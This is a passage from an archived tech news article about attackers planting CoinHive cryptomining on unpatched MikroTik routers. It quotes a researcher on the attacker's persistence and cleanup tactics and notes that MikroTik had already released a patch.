Mr Kenin also noted: “The attacker is clearly showing a high level of understanding of how these MikroTik routers work.”
“This can be seen in the persistence mechanism of the attacker: The attacker scheduled a task which connects to another host “min01.com” and fetches a new “error.html” file.”
“This was probably put in place in case CoinHive blocked the attacker’s current site-key and it had to be replaced with another,” he added.
Mikrotik are a manufacturer of computer networking equipment with a particular focus on wireless devices and routers, they were founded in Latvia in 1995.
The vulnerability that is been exploited was in fact patched very quickly once it was discovered last April by Mikrotic, they quickly issued an update for the routers affected.
However, there is nothing more they can do in this situation, except advice IT workers with unpatched routers to get the latest software version immediately.
Interestingly, Kenin could see the attack attempting to brush his footprints out of the snow: “I noticed this script being updated a few times while working on this blog. The attacker seems to be adding more cleanup commands to leave a smaller footprint and reduce risk of being detected.”
This article is from the CBROnline archive: some formatting and images may not be present.
Join Our Newsletter
Want more on technology leadership?
Sign up for Tech Monitor's weekly newsletter, Changelog, for the latest insight and analysis delivered straight to your inbox.